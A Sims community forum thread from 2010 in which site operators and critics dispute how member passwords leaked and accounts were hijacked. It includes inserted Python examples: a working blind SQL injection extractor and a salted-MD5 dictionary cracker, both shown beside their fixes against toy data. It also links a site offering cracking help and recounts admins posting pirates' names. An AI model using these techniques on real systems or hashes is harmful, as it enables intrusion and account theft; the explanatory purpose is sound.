* logged in as "hamilton" on MTS (that's Thomas's account on there)
* logged in as "sherriesim" on MTS, both with Hide my IP and unproxied IPs
* logged in as "leftywillnot" on TSR
* logged in to a bunch of FA accounts and removed a lot of files

Looks like it could have been Thomas himself then?
Yeah, I think that was the idea with the login to MTS. There was only this one login to MTS with this signature (user agent and IP); the other logins to his account on MTS were normal (not using a proxy and with a different user agent).
Thomas used the same password on multiple sites including MTS and TSR and there were signs of his TSR account being compromised.


Title: Re: GSC has been hacked
Post by: J. M. Pescado on 2010 January 13, 17:02:21
I don't know Bluesoup but i very much doubt she would give login details to the petition to someone on our side.
Willingly? Probably not. But she's incredibly stupid and does some very insecure things. And has a fat head.

I don't know what constitutes a false flag operation but if it includes deliberately spreading false propaganda you should have a talk with Coconut again because it obviously didn't stick.
A false flag operation is when you covertly attack your own side and frame the other side for the act. Coconut is more into "wild speculation based on the available information" and does not have the technical ability or access to stage a false flag operation against anyone.

Thomas used the same password on multiple sites including MTS and TSR and there were signs of his TSR account being compromised.
What sort of "signs"? Merely logins from strange IPs? That could even be Thomas himself checking whether the proxy is working. While Thomas remains the main suspect for the rogue operator who released the information, it could also be someone else. And not all of your DB administrators are fambly, either, apparently. Either way, no matter what happened, SOMEONE leaked the DB information, and the only person who could have done that is a DB administrator. That, or you are postulating the existence of someone who is simultaneously skilled enough to discover and use an exploit in nonstandard software (ruling out script-kiddy public exploits), steal your password database, and inept enough to attempt manual wiping of forum posts as a user, a combination of "extremely skilled" and "extremely stupid, short-sighted, and inefficient" that is completely devoid of internal consistency regardless of what political motivations you wish to ascribe to them.


Title: Re: GSC has been hacked
Post by: Johan on 2010 January 13, 18:32:02
A false flag operation is when you covertly attack your own side and frame the other side for the act. Coconut is more into "wild speculation based on the available information" and does not have the technical ability or access to stage a false flag operation against anyone.
And when the information available isn't interesting enough she can get really creative and just make things up. A false flag operation from that end wouldn't surprise me in the least if she had the opportunity, like for example if she got hold of the petition.
It's interesting that the incriminating evidence she claims to have still hasn't shown up.

What sort of "signs"? Merely logins from strange IPs? That could even be Thomas himself checking whether the proxy is working. While Thomas remains the main suspect for the rogue operator who released the information, it could also be someone else. And not all of your DB administrators are fambly, either, apparently. Either way, no matter what happened, SOMEONE leaked the DB information, and the only person who could have done that is a DB administrator. That, or you are postulating the existence of someone who is simultaneously skilled enough to discover and use an exploit in nonstandard software (ruling out script-kiddy public exploits), steal your password database, and inept enough to attempt manual wiping of forum posts as a user, a combination of "extremely skilled" and "extremely stupid, short-sighted, and inefficient" that is completely devoid of internal consistency regardless of what political motivations you wish to ascribe to them.
There were items in his download basket that he didn't put there. Unfortunately our login log has been purged, so I can't investigate it any further now.

That login information leaked from the TSR database via some kind of exploit or compromised account is one possibility but there could be other explanations to this.
I don't _know_ exactly what happened and it annoys me a great deal.

Thomas doesn't have the knowledge to perform such operations without leaving a trace, and my fellow sysadmin is also out of the question, even if he does have the technical skills required.
To think that one of the owners of TSR (who are the only ones with access to the member database) leaked login information is just not realistic. I know how we think and operate.


Title: Re: GSC has been hacked
Post by: J. M. Pescado on 2010 January 13, 19:05:45
And when the information available isn't interesting enough she can get really creative and just make things up.
I have not seen anything "made up" except theories. Certainly there has been no fabrication of actual EVIDENCE. And everyone is entitled to crackpot theories, after all. Sometimes they're even right.

A false flag operation from that end wouldn't surprise me the least if she had the opportunity. Like for example if she got a hold of the petition.
It's interesting that the incriminating evidence she claims to have still hasn't shown up.
Which incriminating evidence? I haven't seen any "claims".

There were items in his download basket that he didn't put there. Unfortunately our login log has been purged so i can't investigate it any further now.
I fail to see how that is meaningful. Any number of reasons could cause items to be added to a computerized download basket. Technical glitches, misclicks, or he could simply have forgotten. This happens all the time.

That login information leaked from the TSR database via some kind of exploit or compromised account is one possibility but there could be other explanations to this.
I don't _know_ exactly what happened and it annoys me a great deal.
Well, TSR's code is nonstandard. It's not an off-the-shelf component, and as such, is largely immune to attack by common script-kiddies. That means you're going to need some degree of actual wizardry to find and use an exploit. Let us postulate that such an event occurred and resulted in this outside party acquiring your DB. Why, then, is this same party using the access they have gained from it in such an inept, hamfisted way that is utterly inconsistent with anything a wizard would do? Wizards do not concern themselves with anything as boring and drudgerous as manually deleting posts off a site thread by thread. That would be stupid. A wizard would just drop the entire database in a single command. Or steal it and leave silently, without anything to indicate that something was amiss. That is how a wizard would operate. Given that this behavior is completely inconsistent with a wizard, and NO wizard would EVER do such a thing, we must consider the only other alternate hypothesis: An administrative user did so.

Thomas doesn't have the knowledge to perform such operations without leaving a trace, and my fellow sysadmin is also out of the question, even if he does have the technical skills required.
You may very well be right. Maybe they don't have the knowledge to perform such an operation without leaving a trace...and guess what? They didn't. From your own testimony, big, fat, sloppy traces were left everywhere. Not traces solid enough to prove that one of them specifically did it, for whoever did it DID try to cover their tracks, but clearly, enough to reveal that one of them DID do it.

To think that one of the owners of TSR (who are the only ones with access to the member database) leaked login information is just not realistic. I know how we think and operate.
And yet you are left with a conundrum: You agree that TSR owners are the only ones with access to the member database. Yet, information from that database was leaked. Obviously, one of these must be false: Either TSR owners are not the only ones with access to the database, or you don't know how they REALLY think and operate.

I, on the other hand, know security. I know that in order to accomplish such a thing WITHOUT authorized access to the database, one would have to be a wizard. This individual would have to have a decent understanding of PHP and SQL injection. He would have to understand this subject matter enough that he could devise his own attacks, for TSR is not stock code and cannot be attacked by script-kiddy methods. Having thus the ABILITY to gain access to the DB, he would then need to know exactly what to look for in the DB, and then, having found that information, he would need a motive and opportunity to USE it. Now, I know wizards. Wizards are very tight with the information they illicitly gain. They do not squander it casually, especially when it is so hard-won, and certainly are not inclined to allow mere hoi polloi to play with it, especially not in such a clumsy and amateurish fashion. So I argue that it is clear a wizard did not do this. Do you dispute this argument?


Title: Re: GSC has been hacked
Post by: Inge on 2010 January 13, 19:55:42
Yet, information from that database was leaked.

Pescado, this is no longer in question. Johan and Thomas have both openly stated that TSR admins (I think the actual agent was Steve) shared information from the database with a group of TSR artists, supposedly to boost their morale that was low due to having their work "stolen". I am not sure what it was *intended* they should do with the information. In Thomas's case he still thinks it was correct to have done this. In Johan's case he's not so sure. We haven't heard from Steve to find out how he feels about it now.


Title: Re: GSC has been hacked
Post by: Johan on 2010 January 13, 21:18:11
Yet, information from that database was leaked.

Pescado, this is no longer in question. Johan and Thomas have both openly stated that TSR admins (I think the actual agent was Steve) shared information from the database with a group of TSR artists, supposedly to boost their morale that was low due to having their work "stolen". I am not sure what it was *intended* they should do with the information. In Thomas's case he still thinks it was correct to have done this. In Johan's case he's not so sure. We haven't heard from Steve to find out how he feels about it now.
Not quite; the actual agents were Thomas and me. We posted names of pirates we caught by the watermark in a private forum.
The intention was somewhere along the lines of a morale boost for our artists, showing them we were able to do something about the pirate problem.
In all fairness Steve had nothing to do with it.

The watermarking was quite successful until Pescado ruined it all by cleaning the files before putting them in the booty.
Yes, publishing names was short-sighted, morally wrong and thoughtless.
It happened, but if I can help it, it will not happen again.

Anyway, this is completely unrelated to the events we debate now.
Pescado firmly believes that the only way someone could have "hacked" Buggybooz's account on MTS would be that the hacker got the password from the TSR database; this is the leak in question.


Title: Re: GSC has been hacked
Post by: Inge on 2010 January 13, 21:39:15
Johan, in the screenshots of the chat I saw where artists were being given details of some users, it was Steve with them, I am sure. This was a chat, not a forum.


Title: Re: GSC has been hacked
Post by: Johan on 2010 January 13, 22:09:00
I have not seen anything "made up" except theories. Certainly there has been no fabrication of actual EVIDENCE. And everyone is entitled to crackpot theories, after all. Sometimes they're even right.
You don't have to look further than her latest post on PMBD:

Quote from: coconut on PMBD date=1263296840
TSR stores password history, and despite what Team Johan tells you, it is NOT encrypted.
Two made up statements right there:
TSR doesn't store password history at all. Unless Coconut is one of the owners this is information she can't possibly know.
Team Johan was some drivel she posted earlier in that thread, claiming that my postings on PMBD and here were some kind of team effort from TSR. Again presented as a fact, not a theory.

Which incriminating evidence? I haven't seen any "claims".
I was under the impression Coconut had evidence of the petition showing up at TSR, possibly with some involvement of Atwa. That's what I heard when asking if we should just take Coconut's word for what happened, IIRC.

I fail to see how that is meaningful. Any number of reasons could cause items to be added to a computerized download basket. Technical glitches, misclicks, or he could simply have forgotten. This happens all the time.
Sure, all of that is theoretically possible. It is also possible that someone used his account to download stuff and thus knew the password. That could also explain how other passwords could have been obtained if the perpetrator logged in to our admin area as Thomas.

Well, TSR's code is nonstandard. It's not an off-the-shelf component, and as such, is largely immune to attack by common script-kiddies. That means you're going to need some degree of actual wizardry to find and use an exploit. Let us postulate that such a event occurred and resulted in this outside party acquiring your DB. Why, then, is this same party using the access they have gained from it in such an inept, hamfisted way that is utterly inconsistent with anything a wizard would do? Wizards do not concern themselves with anything as boring and drudgerous as manually deleting posts off a site thread by thread. That would be stupid. A wizard would just drop the entire database in a single command. Or steal it and leave silently, without anything to indicate that something was amiss. That is how a wizard would operate. Given that this behavior is completely inconsistent with a wizard, and NO wizard would EVER do such a thing, we must consider the only other alternate hypothesis: An administrative user did so.
Having an in-house system is a double-edged sword. It's pretty much immune to public exploits on the application level, but the security of it is only as good as the knowledge in security possessed by its developers, which would be me and Per.
I'd like to think I have a pretty good understanding of it, but I am by no means a wizard and neither is Per. Part of the codebase is more than 10 years old, and during the time period of the hackings we were maintaining the old system while working on stabilizing the new one. Stupid mistakes could very well have led to weak security in some parts of it all.

Again, we actually don't _know_ that the password came from the TSR database to begin with, you just find it likely based on how you interpret the circumstances.

You may very well be right. Maybe they don't have the knowledge to perform such an operation without leaving a trace...and guess what? They didn't. From your own testimony, big, fat, sloppy traces were left everywhere. Not traces solid enough to prove that one of them specifically did it, for whoever did it DID try to cover their tracks, but clearly, enough to reveal that one of them DID do it.
A trace back to Thomas that I would recognize is what I meant. He certainly wouldn't be able to leave a trace going to sherriesim, which is what we see here.
I believe that trace is genuine and not a cover up.

And yet you are left with a conundrum: You agree that TSR owners are the only ones with access to the member database. Yet, information from that database was leaked. Obviously, one of these must be false: Either TSR owners are not the only ones with access to the database, or you don't know how they REALLY think and operate.
I lean towards either someone had access to the database (via our admin system), a security breach or that the password didn't come from TSR.

I, on the other hand, know security. I know that in order to accomplish sucha thing WITHOUT authorized access to the database, one would have to be a wizard. This individual would have to have a decent understanding of PHP and SQL injection. He would have to understand this subject matter enough that he could devise his own attacks, for TSR is not stock code and cannot be attacked by script-kiddy methods. Having thus the ABILITY to gain access to the DB, he would then need to know exactly what to look for in the DB, and then, having found that information, he would need a motive and opportunity to USE it. Now, I know wizards. Wizards are very tight with the information they illicitly gain. They do not squander it casually, especially when it is so hard-won, and certainly are not inclined to allow mere hoi polloi to play with it, especially not in such a clumsy and amateurish fashion. So I argue that it is clear a wizard did not do this. Do you dispute this argument?
No, I don't think it was a wizard either; the other scenarios I mentioned earlier would be much more likely.
So there, we agree on something at least.

Since you're moving stuff to Sweden, perhaps I can offer some server space in our racks? ;)


Title: Re: GSC has been hacked
Post by: Johan on 2010 January 13, 22:12:31
Johan, the screenshots of the chat I saw where artists were being given details of some users it was Steve with them, I am sure.  This was a chat not a forum.
Not sure what chat that might have been then; I was referring to the forum thread that Coconut got screenshots of.
Steve was not actively harvesting pirates there IIRC though he might have posted in the thread.


Title: Re: GSC has been hacked
Post by: J. M. Pescado on 2010 January 14, 08:17:28
Having an in-house system is a double edged sword. It's pretty much immune to public exploits on the application level but the security of it is only as good as the knowledge in security possessed by its developers, which would be me and Per.
Yes, but to even penetrate BAD security requires a level of understanding comparable to the people who wrote it, or better. Working from the assumption that you are not grossly incompetent, it therefore requires that someone be at LEAST as good as you to penetrate security effectively: As TSR's systems are all nonstandard, someone doing this would be entirely guessing about your database and directory structure, meaning we're dealing with blind PHP/SQL injection. Not exactly a topic that people in the community are terribly familiar with. The entry barrier to such an act combined with the limited pool of technical talent makes this scenario highly unlikely. Someone external to the community on the other hand, could possess the skills necessary to do this, but then would be devoid of community knowledge, so could not effectively exploit this information to attack along political lines as we have seen, nor would they have the motive to do such a thing. An attacker like this would just deface your website and move on. We haven't seen this, so this scenario, also, is highly unlikely.

Again, we actually don't _know_ that the password came from the TSR database to begin with, you just find it likely based on how you interpret the circumstances.
Well, if it did not come from TSR, where did it come from? You already admitted that TSR stored passwords in the clear, readable to anyone with even the bare minimum of database knowledge, providing they could gain access to it. Many of the attacked victims have admitted that they used their TSR password. A few cases are unconfirmed, but we have not had anyone categorically deny it. If the passwords did not come from TSR, where did they come from? The only other site with that kind of broad reach would be MTS2. But MTS2 is running vBulletin, a system that hashes passwords by default. It is possible that it was altered not to do so, but to pursue this line of reasoning would be to directly accuse Delphy of doing this instead. That does not seem like a particularly reasonable scenario given that Delphy has absolutely no motive for such a thing and has intentionally attempted to remain as neutral as possible on the issue. Therefore, I cannot conceive of any other scenario in which passwords which all coincidentally happen to be shared with TSR accounts could come to be compromised without the source being at TSR. Can you? Even if a third-party source were to acquire these passwords by an independent, non-TSR-related means, how would they know the passwords were shared with TSR so that they could selectively attack only those accounts?

A trace back to Thomas that I would recognize is what I meant. He certainly wouldn't be able to leave a trace going to sherriesim, which is what we see here.
I believe that trace is genuine and not a cover up.
We don't really know if there is a trace going to Sherriesim. All we know is that Sherriesim was one of the accounts accessed through that proxy with that particular useragent. Numerous highly plausible scenarios present themselves:
1. Sherriesim's account was among those compromised. As the original owner is apparently deceased, this cannot be verified either way.
2. The useragent, seemingly unique, is actually falsified as part of using the proxy service. This is trivial and common. As a known public proxy service, as opposed to private or misconfigured proxies, such a practice would be quite common and independent usage by Sherriesim would not be surprising.
So yes, I believe the information you traced is probably genuine. However, it is also meaningless. The same proxy IP used over an extended duration by seemingly unrelated people is merely evidence that it is a public proxy service, which we knew.

I lean towards either someone had access to the database (via our admin system), a security breach or that the password didn't come from TSR.
Well, of these three scenarios, two appear highly unlikely for the reasons described above. While anything is certainly POSSIBLE, the latter two are unlikely for technical reasons, whereas the first has no particular technical barrier rendering it unlikely: The only reason it is unlikely is because of a computer technician's reading of people. Computer technicians are not exactly known for their great people-reading skills.

No i don't think it was a wizard either, the other scenarios i mentioned earlier would be much more likely.
So there, we agree on something at least.
You mentioned two alternate scenarios: That an unauthorized user hacked TSR and stole the information from TSR, or that the information did not come from TSR, but was manipulated to LOOK like it did. Both of them involve wizardry: Either someone managed to break security by their own efforts, using technical knowledge to do so, or someone created an elaborate phishing trap to steal information about TSR users without compromising the database, a work which would require a fair level of technical knowledge, as they would need to conduct a man-in-the-middle attack or hijack your DNS, AND create a convincing mock-up of TSR. After this display of technical wizardry, the attacker would then proceed to hack unrelated forums and manually delete posts thread by thread. This makes about as much sense as a terrorist acquiring a nuclear device, removing the detonation charge, and then using the conventional explosive as a suicide bomb.

But you just said you don't believe a wizard did it, either!


Title: Re: GSC has been hacked
Post by: Johan on 2010 January 15, 01:11:13
Yes, but to even penetrate BAD security requires a level of understanding comparable to the people who wrote it, or better. Working from the assumption that you are not grossly incompetent, it therefore requires that someone be at LEAST as good as you to penetrate security effectively: As TSR's systems are all nonstandard, someone doing this would be entirely guessing about your database and directory structure, meaning we're dealing with blind PHP/SQL injection. Not exactly a topic that people in the community are terribly familiar with. The entry barrier to such an act combined with the limited pool of technical talent makes this scenario highly unlikely. Someone external to the community on the other hand, could possess the skills necessary to do this, but then would be devoid of community knowledge, so could not effectively exploit this information to attack along political lines as we have seen, nor would they have the motive to do such a thing. An attacker like this would just deface your website and move on. We haven't seen this, so this scenario, also, is highly unlikely.

Those are good points; finding vulnerabilities in a non-stock system requires a lot more than Google skills, so yes, not likely.
It would be relatively more likely that our forum got hacked, which is a pretty much standard vBulletin install.
The way we integrate it with TSR is that when you sign up on TSR a forum user is added using the same method the forum itself would use had you signed up using the stock install.

I don't find it likely someone within the community would have the skills required for such an attack either, but there are lots of places on the net where script kiddies with egos that need feeding gladly help.

Well, if it did not come from TSR, where did it come from? You already admitted that TSR stored passwords in the clear, readable to anyone with even the bare minimum of database knowledge, providing they could gain access to it. Many of the attacked victims have admitted that they used their TSR password. A few cases are unconfirmed, but we have not had anyone categorically deny it. If the passwords did not come from TSR, where did they come from? The only other site with that kind of broad reach would be MTS2. But MTS2 is running vBulletin, a system that hashes passwords by default. It is possible that it was altered not to do so, but to pursue this line of reasoning would be to directly accuse Delphy of doing this instead. That does not seem like a particularly reasonable scenario given that Delphy has absolutely no motive for such a thing and has intentionally attempted to remain as neutral as possible on the issue. Therefore, I cannot conceive of any other scenario in which passwords which all coincidentally happen to be shared with TSR accounts could come to be compromised without the source being at TSR. Can you? Even if a third-party source were to acquire these passwords by an independent, non-TSR-related means, how would they know the passwords were shared with TSR so that they could selectively attack only those accounts?
Hashed passwords (in this case md5 + salt) are not immune to decoding. Google it if you're in doubt.
Buggy's password was even of the sort you could have guessed and got lucky.

We don't really know if there is a trace going to Sherriesim. All we know is that Sherriesim was one of the accounts accessed through that proxy with that particular useragent. Numerous highly plausible scenarios present themselves:
1. Sherriesim's account was among those compromised. As the original owner is apparently deceased, this cannot be verified either way.
2. The useragent, seemingly unique, is actually falsified as part of using the proxy service. This is trivial and common. As a known public proxy service, as opposed to private or misconfigured proxies, such a practice would be quite common and independent usage by Sherriesim would not be surprising.
So yes, I believe the information you traced is probably genuine. However, it is also meaningless. The same proxy IP used over an extended duration by seemingly unrelated people is merely evidence that it is a public proxy service, which we knew.
In response to those scenarios:
#1 We also know that the Sherriesim account was accessed through a non-proxy IP with that particular useragent.
This is a significant detail. The origin of that IP fits with Sherriesim's location AFAIK.

Thomas or someone acting on his behalf would not be able to fake that.
Without this detail I would have agreed with your conclusion.

#2 The information about this particular user agent was not revealed until after the events took place.
The useragent string matched very few logins on TSR and MTS, so it's not at all common within the community.
If any other community site would be interested to dig further into this, I can post what useragent and IP (non-proxied) to look for.

Well, of these three scenarios, two appear highly unlikely for the reasons described above. While anything is certainly POSSIBLE, the latter two are unlikely for technical reasons, whereas the first has no particular technical barrier rendering it unlikely: The only reason it is unlikely is because of a computer technician's reading of people. Computer technicians are not exactly known for their great people-reading skills.
I don't think I have any special skills reading people, but I can usually tell if Thomas is lying to me; it's probably not very unusual within a family.

I simply don't believe the passwords were willingly handed out by Thomas for many reasons, but mostly because I know him very well.
There would be absolutely no gain for him and/or TSR to have someone hack Buggy's account on MTS.

You might think he's stupid, evil, greedy and whatever else his reputation says he is, and therefore you find it plausible or even likely he did it.
I know what he really is like, and although I don't always agree with his ways it's really not _that_ bad.
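The "blind PHP/SQL injection" barrier raised in the quoted text above, shown concretely. This is an added example written for this page, not code from TSR, vBulletin or any poster, and it does not describe a flaw in any real site: the `members` table, the `admin` row and the `secret` value are constructed for the demo. The only signal the attacker gets back is whether the lookup matched, which is exactly what a blind attack works with; the attacker also has to know (or guess) the table and column names, and every probe is a query the site can log.

```python
"""Boolean-based blind SQL injection against a toy forum lookup, and the fix.

Added example for this page; not code from TSR, vBulletin or any poster.
Schema, table name, row and secret value are constructed for the demo.
"""
import sqlite3
import string


def make_db():
    # Constructed data: one privileged member with a (fake) stored secret.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE members (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)")
    db.execute("INSERT INTO members (name, secret) VALUES ('admin', 'hunter2')")
    return db


def lookup_vulnerable(db, name):
    """Splices user input straight into the SQL text.
    Returns only True/False: the one bit a blind attacker gets per query."""
    sql = "SELECT id FROM members WHERE name = '%s'" % name
    return db.execute(sql).fetchone() is not None


def lookup_fixed(db, name):
    """Hardened form: the input travels as a bound parameter, never as SQL."""
    sql = "SELECT id FROM members WHERE name = ?"
    return db.execute(sql, (name,)).fetchone() is not None


def is_injectable(oracle):
    """Two probes that differ only in a tautology vs. a contradiction."""
    return oracle("admin' AND 1=1 --") and not oracle("admin' AND 1=2 --")


def blind_extract(oracle, column="secret", max_len=32):
    """Recover members.<column> for 'admin' one character at a time.

    unicode()/substr() keep quote characters out of the payload.  The
    attacker must already know the table and column names; guessing those
    is the barrier the thread talks about.  Returns (value, query_count)
    so the cost in logged queries is visible."""
    alphabet = string.ascii_letters + string.digits
    recovered, queries = "", 0
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            payload = "admin' AND unicode(substr(%s,%d,1))=%d --" % (column, pos, ord(ch))
            queries += 1
            if oracle(payload):
                recovered += ch
                break
        else:
            # No character matched at this position: substr() returned '' and
            # unicode('') is NULL, so the value has ended.
            return recovered, queries
    return recovered, queries


if __name__ == "__main__":
    db = make_db()
    vuln = lambda n: lookup_vulnerable(db, n)
    safe = lambda n: lookup_fixed(db, n)
    print("vulnerable injectable:", is_injectable(vuln), blind_extract(vuln))
    print("fixed injectable:     ", is_injectable(safe), blind_extract(safe))
```

Against the vulnerable lookup the loop recovers the whole secret with a couple of hundred queries; against the parameterized lookup the very same payloads are just a member name that does not exist, so the oracle never says yes.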


Title: Re: GSC has been hacked
Post by: J. M. Pescado on 2010 January 15, 01:31:48
It would be relatively more likely that our forum got hacked, which is pretty much a standard vBulletin install.
The way we integrate it with TSR is that when you sign up on TSR, a forum user is added using the same method the forum itself would use had you signed up using the stock install.
The forum could be hackable, but again, let's look at the motives and opportunities of people who would do such a thing.
1. Random Net Kiddies: Someone like this simply would not have the patience to try to puzzle out your arcane DB structure and extract passwords. An attacking script kiddy will deface your forum and move on to the next target.
2. Someone from the community: Assuming you postulate an anti-TSR activist doing this, one who is impulsive and disregards publicly-issued orders, would they honestly pass up an opportunity to simply vandalize your forum directly, or pass up the intelligence coup that being able to read your Secret Squirrel sections would be? Alternatively, if it is the work of an internal TSR faction, they would still be interested in your Secret Squirrelism.

I don't find it likely someone within the community would have the skills required for such an attack either, but there are lots of places on the net where script kiddies with egos that need feeding gladly help.
And so we come to the fact that the community is just not that technically apt. And script kiddies don't operate this way, they go for quantity: Vandalize, move on.

Hashed passwords (in this case md5 + salt) are not immune to decoding. Google it if you're in doubt.
Buggy's password was even of the sort you could have guessed and got lucky.
It is possible to crack a salted md5 password, given a sufficiently weak password and sufficient time. However, this is nontrivial in both computational expense and skill required, because you'd need to rig up a small cluster to be able to break unrelated passwords in reasonable time. And there are simply far better ways of doing so if you can acquire a hashed password off someone else's database (also, md5 is losing popularity as a cryptographic hash and software that uses it is becoming uncommon, as most now prefer SHA or others). Additionally, it does not address the fact that even IF they acquired the password elsewhere, they would not know that users were ALSO using them on TSR, and thus would not be able to selectively attack only TSR users, unless they were testing every compromised user on TSR first, which you would notice. While it is possible that the Buggybooz password was individually guessed, a password guessing attack would A: Leave evidence of previous login failures unless they managed to completely luck out and guess the first time, and B: Not repeatedly occur and correlate with people-who-happened-to-reuse-TSR-passwords. With that in mind, I am quite certain the passwords originate from the TSR database. As for HOW they originated from the TSR database, we've ruled out pretty much all the Johan-supported scenarios, on technical grounds, so unless you've got a new scenario to propose, we're running out of non-ugly ways to see this.

In response to those scenarios:
#1 We also know that the Sherriesim account was accessed through a non-proxy IP with that particular useragent.
This is a significant detail. The origin of that IP fits with Sherriesim's location AFAIK.
"The UK" is not really a meaningful location to fit things to, as many people come from that area, including, but not limited to, say, Atwa, IIRC.

Thomas or someone acting on his behalf would not be able to fake that.
Without this detail I would have agreed with your conclusion.
Unless said person were, say, from the UK. In truth, the Sherriesim detail doesn't really answer the question of where the passwords came from. It only tells us that the attacker who directly carried out the action was possibly not Thomas himself.

I don't think I have any special skills reading people, but I can usually tell if Thomas is lying to me; it's probably not very unusual within a family.
You might think he's stupid, evil, greedy and whatever else his reputation says he is, and therefore you find it plausible or even likely he did it.
I know what he really is like, and although I don't always agree with his ways it's really not _that_ bad.
Fair enough, but that leaves unaddressed the question of who did it. Either Thomas is not showing any signs of lying because he genuinely believes what he told you is true, perhaps because you asked the wrong questions or he misunderstood the question or the acts, or someone else did it. Both could be entirely plausible.

I simply don't believe the passwords were willingly handed out by Thomas for many reasons, but mostly because I know him very well.
There would be absolutely no gain for him and/or TSR to have someone hack Buggy's account on MTS.
YOU simply wouldn't believe it. And you're right: There's absolutely no logical gain to be had from such an act. Doesn't mean people, particularly artiste-types, don't frequently and consistently behave stupidly and illogically. As a computer tech, this idea is probably not something you really grok, but people are frequently very stupid, irrational, and short-sighted. This is why they buy insurance, lottery tickets, and crap some spammer shilled.
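Johan's point that md5 + salt is not immune to decoding and Pescado's reply that cracking needs a weak password and time, put side by side in code. This is an added example written for this page, not code from vBulletin, TSR or any poster. The hash layout md5(md5(password) + salt), the salt value, the server-side pepper and the wordlist are assumed or constructed for the demo; the pepper stands in for a salt "stored elsewhere" than the member table.

```python
"""Dictionary attack on a salted-MD5 forum hash, beside a slow keyed hash.

Added example for this page; not code from vBulletin, TSR or any poster.
Hash layout, salt, pepper and wordlist are assumed/constructed for the demo.
"""
import hashlib
import hmac
import os
import time


def vb_style_hash(password, salt):
    """Assumed layout md5(md5(password) + salt).  The salt defeats precomputed
    tables, but a guess still costs only two MD5 calls."""
    inner = hashlib.md5(password.encode("utf-8")).hexdigest()
    return hashlib.md5((inner + salt).encode("utf-8")).hexdigest()


# Constructed stand-in for the wordlist a cracking forum would run.
WORDLIST = ["123456", "password", "qwerty", "letmein", "sims2fan", "dragon",
            "password1", "iloveyou", "abc123", "trustno1"]


def crack_fast(target, salt, wordlist):
    """Dictionary attack with the salt in hand: weak passwords fall instantly."""
    for guess in wordlist:
        if hmac.compare_digest(vb_style_hash(guess, salt), target):
            return guess
    return None


def slow_hash(password, salt, pepper, iterations=100_000):
    """PBKDF2-HMAC-SHA256 over an HMAC of the password keyed with a pepper.
    The per-user salt lives in the row; the pepper lives elsewhere (config,
    environment), so a bare database dump is not enough to start guessing,
    and each guess costs `iterations` HMACs instead of two MD5s."""
    keyed = hmac.new(pepper, password.encode("utf-8"), hashlib.sha256).digest()
    return hashlib.pbkdf2_hmac("sha256", keyed, salt, iterations)


def new_record(password, pepper, iterations=100_000):
    salt = os.urandom(16)
    return {"salt": salt, "iterations": iterations,
            "hash": slow_hash(password, salt, pepper, iterations)}


def verify(record, password, pepper):
    cand = slow_hash(password, record["salt"], pepper, record["iterations"])
    return hmac.compare_digest(cand, record["hash"])


def crack_slow(record, pepper, wordlist):
    """Same dictionary against the slow hash; without the right pepper the
    attacker cannot even begin."""
    for guess in wordlist:
        if verify(record, guess, pepper):
            return guess
    return None


def guesses_per_second(fn, seconds=0.2):
    """Rough guess rate of a hashing function on this machine."""
    n, start = 0, time.perf_counter()
    while time.perf_counter() - start < seconds:
        fn()
        n += 1
    return n / seconds


if __name__ == "__main__":
    salt, pepper = "aB3x", b"server-side-secret-kept-out-of-the-db"  # assumed
    print("fast:", crack_fast(vb_style_hash("password1", salt), salt, WORDLIST))
    rec = new_record("password1", pepper)
    print("slow:", crack_slow(rec, pepper, WORDLIST), "wrong pepper:", crack_slow(rec, b"x", WORDLIST))
    print("md5 guesses/s:", int(guesses_per_second(lambda: vb_style_hash("g", salt))))
    print("pbkdf2 guesses/s:", int(guesses_per_second(lambda: slow_hash("g", rec["salt"], pepper))))
```

The guess-rate lines are the point of the thread's argument: a salted MD5 falls to a dictionary in the time it takes to read the forum post asking for help, whereas the slow keyed hash turns the same wordlist into seconds per guess and is useless without the pepper, which is never in the member table.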


Title: Re: GSC has been hacked
Post by: Inge on 2010 January 15, 07:41:36
As a T with some F, I say that a twin *would* know if their twin was lying. Whether techie or artistic. And the liar would be finding it increasingly hard to look nonchalant as the pressure is maintained and the income of several people they are close to reduces as a result.

I have made the point that because Thomas has chosen to put on a bold face to the public and maintain he did nothing wrong in originally doxing members, it has *invited* suspicion of further, more heinous, acts that he probably did not commit. Had he put his hands up in the first place and said the doxing was a mistake, like Johan has, then although there would still be disdain for TSR as a paysite, we probably would not be thinking of Thomas as the devil incarnate right now.

The reason most sims sites get hacked is a combination of poor security and a person who has a grudge against the site owner. Everyone can take care of point 1, then 1000 devil Thomases with 1000 minion ATWAs working under their direct instruction can't touch you. A hacker to your sims site does you a favour. It teaches you about security before you make the same mistake with your company's website and lose a load of money. Part of that security is about vetting the people you entrust with privileges and info on the site - and this comes full circle back to TSR trusting unvetted FAs with admin-level information.


Title: Re: GSC has been hacked
Post by: Johan on 2010 January 15, 08:45:23
The forum could be hackable, but again, let's look at the motives and opportunities of people who would do such a thing.
1. Random Net Kiddies: Someone like this simply would not have the patience to try to puzzle out your arcane DB structure and extract passwords. An attacking script kiddy will deface your forum and move on to the next target.
2. Someone from the community: Assuming you postulate an anti-TSR activist doing this, one who is impulsive and disregards publicly-issued orders, would they honestly pass up an opportunity to simply vandalize your forum directly, or pass up the intelligence coup that being able to read your Secret Squirrel sections would be? Alternatively, if it is the work of an internal TSR faction, they would still be interested in your Secret Squirrelism.

And so we come to the fact that the community is just not that technically apt. And script kiddies don't operate this way, they go for quantity: Vandalize, move on.

A third option could be a combination: a 2 getting help from a 1.

It is possible to crack a salted md5 password, given a sufficiently weak password and sufficient time. However, this is nontrivial in both computational expense and skill required, because you'd need to rig up a small cluster to be able to break unrelated passwords in reasonable time. And there are simply far better ways of doing so if you can acquire a hashed password off someone else's database (also, md5 is losing popularity as a cryptographic hash and software that uses it is becoming uncommon, as most now prefer SHA or others). Additionally, it does not address the fact that even IF they acquired the password elsewhere, they would not know that users were ALSO using them on TSR, and thus would not be able to selectively attack only TSR users, unless they were testing every compromised user on TSR first, which you would notice. While it is possible that the Buggybooz password was individually guessed, a password guessing attack would A: Leave evidence of previous login failures unless they managed to completely luck out and guess the first time, and B: Not repeatedly occur and correlate with people-who-happened-to-reuse-TSR-passwords. With that in mind, I am quite certain the passwords originate from the TSR database. As for HOW they originated from the TSR database, we've ruled out pretty much all the Johan-supported scenarios, on technical grounds, so unless you've got a new scenario to propose, we're running out of non-ugly ways to see this.

http://www.waraxe.us/forum-57.html
This is an example of where you could get information on how to crack a hashed password, find someone to crack it for you and even get help hacking a forum.

The main reason I don't want to write this scenario off completely is that we have had other events where someone managed to log in on multiple FA accounts on TSR and was able to delete things.
